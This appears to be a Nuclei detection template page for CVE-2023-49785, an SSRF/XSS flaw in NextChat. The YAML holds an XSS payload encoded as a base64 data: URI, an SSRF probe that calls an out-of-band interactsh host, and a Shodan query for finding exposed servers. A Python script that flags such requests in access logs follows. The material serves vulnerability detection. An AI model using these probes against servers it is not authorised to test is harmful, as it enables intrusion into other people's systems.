ChatGPT-Next-Web - SSRF/XSS
ID: CVE-2023-49785
Severity: critical
Author: high
Tags: cve,cve2023,ssrf,xss,chatgpt,nextchat
Description
Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
YAML Source
id: CVE-2023-49785

info:
  name: ChatGPT-Next-Web - SSRF/XSS
  author: high
  severity: critical
  description: |
    Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
  remediation: |
    Do not expose to the Internet
  reference:
    - https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/
    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-49785
    cwe-id: CWE-79
    epss-score: 0.00049
    epss-percentile: 0.17861
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:NextChat,\"ChatGPT Next Web\""
  tags: cve,cve2023,ssrf,xss,chatgpt,nextchat

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "<script>alert(document.domain)</script>")
          - contains(header_1, "text/html")
        condition: and

      - type: dsl
        dsl:
          - contains(header_2,'X-Interactsh-Version')
          - contains(interactsh_protocol_2,'dns')
        condition: and
# digest: 4a0a0047304502201181295309108be09c1c8fc72b88ba1af64fb6c12a7589bca81000db6b3fabca0221009cafdc8db527c90c3925bceb03e0c741f6d137a2c059467e285a992e18933539:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-49785.yaml"
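To see whether requests of the two shapes this template sends have already reached a server, the web access log can be checked for the same `/api/cors/` paths. The script below is an added example, not part of the template or of the NextChat project; the log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

CORS_PREFIX = "/api/cors/"  # endpoint both template probes request
# Assumed log format: common/combined access log (client first, quoted request line).
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" \d{3}')
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)

# Constructed sample lines; addresses and host names are documentation placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2024:10:01:02 +0000] "GET /api/cors/data:text%2fhtml;base64,QUJD%23 HTTP/1.1" 200 3
203.0.113.5 - - [12/Mar/2024:10:01:03 +0000] "GET /api/cors/http:%2f%2fnextchat.oob.example%23 HTTP/1.1" 200 0
198.51.100.7 - - [12/Mar/2024:10:02:00 +0000] "GET /api/cors/HTTP:%2F%2F192.0.2.10 HTTP/1.1" 200 512
198.51.100.7 - - [12/Mar/2024:10:02:05 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def classify(raw_path):
    """Return a finding for a /api/cors/ request, or None for any other path."""
    if not raw_path.startswith(CORS_PREFIX):
        return None
    target = unquote(raw_path[len(CORS_PREFIX):])  # decodes %2f, %2F and %23
    m = SCHEME_RE.match(target)
    scheme = m.group(1).lower() if m else None
    reasons = []
    if scheme == "data":
        reasons.append("data: URI as proxy target (shape of the template's XSS probe)")
    elif scheme and target[m.end():].startswith("//"):
        reasons.append("absolute URL as proxy target (shape of the template's SSRF probe)")
    if "%23" in raw_path:
        reasons.append("encoded '#' in the target, as in both template probes")
    return {"scheme": scheme, "target": target, "reasons": reasons}


def scan(log_text):
    """Return (client, scheme, reason_count) for every flagged request line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        hit = classify(m.group(2)) if m else None
        if hit and hit["reasons"]:
            findings.append((m.group(1), hit["scheme"], len(hit["reasons"])))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```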